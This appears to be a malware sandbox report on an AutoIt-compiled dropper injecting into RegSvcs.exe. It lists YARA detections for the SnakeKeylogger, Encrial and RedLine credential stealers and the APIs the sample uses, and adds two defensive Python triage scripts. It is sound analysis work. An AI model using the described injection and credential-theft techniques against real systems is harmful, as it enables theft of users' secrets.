Source: 1.2.RegSvcs.exe.2db0bf6.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 1.2.RegSvcs.exe.2db0bf6.1.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 1.2.RegSvcs.exe.4065570.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 1.2.RegSvcs.exe.4065570.4.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer, Author: ditekSHen
Source: 1.2.RegSvcs.exe.4065570.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 1.2.RegSvcs.exe.4065570.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 1.2.RegSvcs.exe.5680000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 1.2.RegSvcs.exe.5680000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 1.2.RegSvcs.exe.56c0000.8.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 1.2.RegSvcs.exe.56c0000.8.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 00000001.00000002.4195976389.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65, Author: unknown
Source: 00000001.00000002.4195976389.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware, Author: Florian Roth
Source: 00000001.00000002.4192706984.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer, Author: ditekSHen
Source: 00000000.00000002.1739970349.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer, Author: ditekSHen
                  Source: 00000001.00000002.4193632082.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: Process Memory Space: RegSvcs.exe PID: 6344, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: This is a third-party compiled AutoIt script. 0_2_00983B3A
                  Source: Requested Documentation.exe String found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: Requested Documentation.exe, 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_7509ab2d-7
                  Source: Requested Documentation.exe, 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_c29c411c-2
                  Source: Requested Documentation.exe String found in binary or memory: This is a third-party compiled AutoIt script. memstr_c36f905d-c
                  Source: Requested Documentation.exe String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` memstr_f187c987-b
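The rows above show that the sandbox keyed its "compiled AutoIt script" verdict on the runtime's own error-dialog string appearing in the binary and in its mapped image. The following Python scanner is an added example, not code from Joe Sandbox or from this report: it searches a file for that string in both narrow and wide (UTF-16LE) form, and also for the AU3!EA06 marker that precedes the embedded script resource in AutoIt v3 binaries (the marker comes from general AutoIt knowledge and is not mentioned in the report). The sample bytes it builds when run without a file are constructed, not the analysed sample.

```python
import re

# Markers for a compiled AutoIt v3 script. AUTOIT_MESSAGE is the string this report
# found; AUTOIT_SCRIPT_MAGIC precedes the embedded script resource (general AutoIt
# knowledge, not taken from this report).
AUTOIT_MESSAGE = b"This is a third-party compiled AutoIt script."
AUTOIT_SCRIPT_MAGIC = b"AU3!EA06"


def autoit_markers(data: bytes):
    """Return (marker_name, encoding, offset) for every occurrence of an AutoIt
    marker. Both ASCII and UTF-16LE forms are searched because the runtime stores
    its UI strings as wide strings while the script magic is narrow."""
    found = []
    for name, marker in (("message", AUTOIT_MESSAGE), ("script_magic", AUTOIT_SCRIPT_MAGIC)):
        wide = marker.decode("ascii").encode("utf-16-le")
        for enc, needle in (("ascii", marker), ("utf-16le", wide)):
            for m in re.finditer(re.escape(needle), data):
                found.append((name, enc, m.start()))
    return sorted(found, key=lambda t: t[2])


def is_compiled_autoit(data: bytes) -> bool:
    """Call it compiled AutoIt when the runtime message is present (what the report
    keyed on). The script magic raises confidence but is not required, because a
    packer may encrypt or relocate the script resource while the runtime's own
    strings survive."""
    names = {name for name, _, _ in autoit_markers(data)}
    return "message" in names


def build_sample() -> bytes:
    """Constructed stand-in for a compiled AutoIt binary: a fake PE stub, filler,
    the wide-string message, more filler, then the script magic."""
    return (b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"\x90" * 100
            + AUTOIT_MESSAGE.decode("ascii").encode("utf-16-le") + b"\x00" * 40
            + AUTOIT_SCRIPT_MAGIC + b"\x00" * 16)


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    for name, enc, off in autoit_markers(data):
        print(f"{name:13} {enc:9} at 0x{off:08x}")
    print("compiled AutoIt:", is_compiled_autoit(data))
```

Run it with a path argument to scan a real file; the offsets it prints are where a follow-up script-extraction step would start looking for the script resource.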
                  Source: initial sample Static PE information: Filename: Requested Documentation.exe
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: 0_2_009EA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: 0_2_009D8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: 0_2_009E51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: 0_2_0098E6A0
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: 0_2_009AD975
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: 0_2_009A21C5
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: 0_2_009B62D2
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: 0_2_00A003DA
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: 0_2_009B242E
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: 0_2_009A25FA
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: 0_2_009966E1
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: 0_2_009DE616
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: 0_2_009B878F
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: 0_2_009E8889
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: 0_2_00998808
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: 0_2_009B6844
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: 0_2_00A00857
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: 0_2_009ACB21
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: 0_2_009B6DB6
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: 0_2_00996F9E
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: 0_2_00993030
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: 0_2_009A3187
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: 0_2_009AF1D9
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: 0_2_00981287
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: 0_2_009A1484
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: 0_2_00995520
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: 0_2_009A7696
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: 0_2_00995760
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: 0_2_009A1978
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: 0_2_009B9AB5
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: 0_2_0098FCE0
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: 0_2_009A1D90
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: 0_2_009ABDA6
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: 0_2_00A07DDB
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: 0_2_00993FE0
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: 0_2_0098DF00
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: 0_2_013035F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00408C60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0040DC11
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00407C3F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00418CCC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00406CA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_004028B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0041A4BE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00418244
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00401650
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00402F20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_004193C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00418788
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00402F89
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_00402B90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_004073A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_02EA1448
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_02EA1437
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_02EA11A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_02EA1199
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05728498
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05722F68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0572EF30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05724FCB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_057249B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_057221E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05722F59
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0572EF21
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05EE69F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05EEB128
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05EEE088
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05EEB780
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05EE6328
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05EE1DF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05EE5980
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05EE5970
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05EE6108
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05EEB118
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05EEACC1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05EEACD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05EEF8A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05EEF890
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05EEA868
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05EEA878
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05EEF448
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05EEA420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05EEDC20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05EEF438
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05EEDC30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05EEA411
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05EED7CA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05EE9FC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05EED7D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05EE9FB8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05EED380
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05EE9B60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05EEB772
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05EE9B70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05EED370
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05EECF28
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05EECF18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05EEEF10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05EECAC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05EECAD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05EEC668
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05EEC678
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_05EE1E08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_06AA3C74
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_06AA5520
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_06AA7271
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_06AAC109
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_06AA3958
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: String function: 0040E1D8 appears 43 times
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: String function: 00987DE1 appears 35 times
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: String function: 009A8900 appears 42 times
                  Source: C:\Users\user\Desktop\Requested Documentation.exe Code function: String function: 009A0AE3 appears 70 times
                  Source: Requested Documentation.exe, 00000000.00000003.1735346207.0000000003DD3000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Requested Documentation.exe
                  Source: Requested Documentation.exe, 00000000.00000003.1736923449.0000000003FBD000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Requested Documentation.exe
                  Source: Requested Documentation.exe, 00000000.00000002.1739970349.0000000003C70000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCloudServices.exe< vs Requested Documentation.exe
                  Source: Requested Documentation.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
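Two kinds of row in this report repay a second look: the "Matched rule" rows (the short form above and the form carrying full rule metadata that follows), where the RedLine rule fires on the RegSvcs.exe image at 0x400000 while the SnakeKeylogger and Encrial rules fire on separate heap regions of the same process, and the "OriginalFilename ... vs" rows, where a memory region of Requested Documentation.exe carries version info naming a different file (ntdll.dll, CloudServices.exe). The Python triage script below is an added example, not code from Joe Sandbox or from this report. It parses rows in the shapes shown (the sample lines are copied from this report with the column separators the HTML table lost put back, and one metadata row trimmed to a few fields), groups YARA hits by rule family and by process/region, flags processes where rules for more than one family fired, and lists regions whose OriginalFilename does not match the host binary. The rule-name-to-family mapping is my assumption; the source-string layouts (pid.phase.image.address.index[.raw].unpack and the dotted .sdmp names) are read off the rows themselves.

```python
import re
from collections import defaultdict

# Sample input: rows copied from the report, separators restored. The MAL_Envrial
# row keeps only some of its metadata fields.
REPORT_LINES = [
    "Source: 1.2.RegSvcs.exe.2db0bf6.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown",
    "Source: 1.2.RegSvcs.exe.2db0bf6.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth",
    "Source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen",
    "Source: 00000001.00000002.4192706984.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen",
    "Source: 00000000.00000002.1739970349.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects RedLine infostealer Author: ditekSHen",
    "Source: Process Memory Space: RegSvcs.exe PID: 6344, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown",
    "Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073",
    "Source: 1.2.RegSvcs.exe.5680ee8.6.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, author = Florian Roth, description = Detects Encrial credential stealer malware",
    "Source: Requested Documentation.exe, 00000000.00000003.1735346207.0000000003DD3000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Requested Documentation.exe",
    "Source: Requested Documentation.exe, 00000000.00000002.1739970349.0000000003C70000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCloudServices.exe< vs Requested Documentation.exe",
]

# Row shapes as they appear in the report; \s* also accepts the fused form
# ("UNPACKEDPEMatched rule", ".sdmpBinary or memory string").
YARA_RE = re.compile(r"^Source: (?P<src>.+?), type: (?P<kind>[A-Z]+)\s*Matched rule: (?P<rest>.+)$")
META_RE = re.compile(r"(\w+) = (.*?)(?=, \w+ = |$)")       # key = value; values may contain commas
UNPACK_RE = re.compile(r"^(?P<proc>\d+)\.\d+\.(?P<image>.+?\.exe)\.(?P<addr>[0-9a-f]+)\.\d+(?:\.raw)?\.unpack$")
SDMP_RE = re.compile(r"^(?P<proc>\d{8})\.\d{8}\.\d+\.(?P<addr>[0-9A-F]{16})\.")
PMS_RE = re.compile(r"^Process Memory Space: (?P<image>.+?) PID: \d+$")
ORIG_RE = re.compile(r"^Source: (?P<host>.+?), (?P<dump>\S+\.sdmp)\s*Binary or memory string: "
                     r"OriginalFilename(?P<embedded>\S+?\.(?:exe|dll))\S* vs (?P<vs>.+)$")

# Assumed mapping from rule name or description to family; not part of the report.
FAMILY_HINTS = {"redline": "RedLine", "snakekeylogger": "SnakeKeylogger",
                "envrial": "Encrial", "encrial": "Encrial"}


def parse_yara_hit(line):
    """Return {source, kind, label, author, meta} for a 'Matched rule' row, else None."""
    m = YARA_RE.match(line)
    if not m:
        return None
    rest = m["rest"]
    if " Author: " in rest:                      # short form: rule name or description, then author
        label, author = rest.rsplit(" Author: ", 1)
        meta = {}
    else:                                        # long form: rule name, then key = value metadata
        label, _, tail = rest.partition(" ")
        meta = dict(META_RE.findall(tail))
        author = meta.get("author", "unknown")
    return {"source": m["src"], "kind": m["kind"], "label": label, "author": author, "meta": meta}


def family_of(label):
    low = label.lower()
    return next((fam for hint, fam in FAMILY_HINTS.items() if hint in low), "unknown")


def region_of(source):
    """Map a source string to (process index or image name, region base address or None)."""
    if m := UNPACK_RE.match(source):
        return int(m["proc"]), int(m["addr"], 16)
    if m := SDMP_RE.match(source):
        return int(m["proc"]), int(m["addr"], 16)
    if m := PMS_RE.match(source):
        return m["image"], None                  # whole-process string scan, no address
    return source, None


def families_by_process(lines):
    """family -> process -> set of region base addresses that matched."""
    table = defaultdict(lambda: defaultdict(set))
    for line in lines:
        hit = parse_yara_hit(line)
        if hit is None:
            continue
        proc, addr = region_of(hit["source"])
        regions = table[family_of(hit["label"])][proc]  # records the process even without an address
        if addr is not None:
            regions.add(addr)
    return table


def attribution_conflicts(table):
    """Processes where rules for more than one family fired. Treat the rule names as
    a lead, not a verdict: the extracted configuration decides the family."""
    fams = defaultdict(set)
    for fam, by_proc in table.items():
        for proc in by_proc:
            fams[proc].add(fam)
    return {proc: sorted(f) for proc, f in fams.items() if len(f) > 1}


def original_filename_mismatches(lines):
    """Regions whose PE version info names a file other than the host binary:
    evidence of an embedded or mapped second image inside the process."""
    out = []
    for line in lines:
        if not (m := ORIG_RE.match(line)):
            continue
        if m["embedded"].lower() == m["vs"].lower():
            continue                             # same name as the host, nothing to flag
        dump = SDMP_RE.match(m["dump"])
        out.append({"host": m["vs"], "embedded": m["embedded"],
                    "address": int(dump["addr"], 16) if dump else None})
    return out


if __name__ == "__main__":
    table = families_by_process(REPORT_LINES)
    for fam, by_proc in sorted(table.items()):
        for proc, regions in sorted(by_proc.items(), key=str):
            print(f"{fam:15} proc={proc!s:12} regions={[hex(a) for a in sorted(regions)]}")
    print("conflicts:", attribution_conflicts(table))
    print("mismatches:", original_filename_mismatches(REPORT_LINES))
```

On the rows from this report the script reports process 1 (RegSvcs.exe) under all three families, which is the signal to go to the extracted configuration and the network indicators rather than to pick a family from whichever rule happens to be listed first; the MAL_Envrial_Jan18_1 rule in particular dates from 2018 and, as its own description says, targets a generic credential stealer.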
                  Source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 1.2.RegSvcs.exe.5680ee8.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.RegSvcs.exe.5680ee8.6.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.RegSvcs.exe.2db1ade.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.RegSvcs.exe.2db1ade.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.RegSvcs.exe.408e590.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
